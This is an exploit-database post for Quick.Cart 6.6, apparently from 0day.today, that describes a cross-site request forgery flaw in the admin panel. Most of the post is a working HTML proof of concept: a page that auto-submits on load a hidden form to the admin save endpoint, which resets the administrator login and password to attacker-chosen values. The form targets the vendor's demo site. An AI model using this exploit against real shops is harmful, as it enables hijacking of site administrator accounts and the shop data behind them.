QuikCart 6.6 - CSRF Privilege Escalation Exploit

# Title : QuikCart 6.6 - CSRF Privilege Escalation Exploit
# Author : ZwX
# Vendor : http://opensolution.org/
# Download Link : http://opensolution.org/download/home.html?sFile=Quick.Cart_v6.6.zip
# Version : 6.6
# Security Level : Hight
# Tested Os : Windows 7

**** Description Vulnerability ****
-----------------------------------

A type of Cross Site Request Forgery vulnerability is located in the cms "QuikCart".
In the absence of a token attacker can execute HTML code to administrator privilege to have admin access.

**** Exploit Code ****
----------------------

<html>
<body onLoad="hack()">
<script>
function hack(){
var e=document.getElementById('add')
e.submit()
}
</script>
<!-- Cross Site Request Forgery -->
<form id="add" method="post" action="http://demo.opensolution.org/Quick.Cart.Ext/admin.php?p=admins-form&sOption=save&iAdmin=1"/>
<input type="text" name="sLogin" value="admin" alt="simple" class="input" accesskey="1" tabindex="1" />
<input type="text" name="sPass" value="1212" alt="simple" class="input" tabindex="2" />
<input type="text" name="sName" value="admin" alt="simple" class="input" tabindex="3" />
<input type="text" name="sEmail" value="[email protected]" class="input" tabindex="4" />
<input type="checkbox" checked="checked" name="iStatus" value="1" />
</form>
</html>

#  0day.today [2018-01-04]  #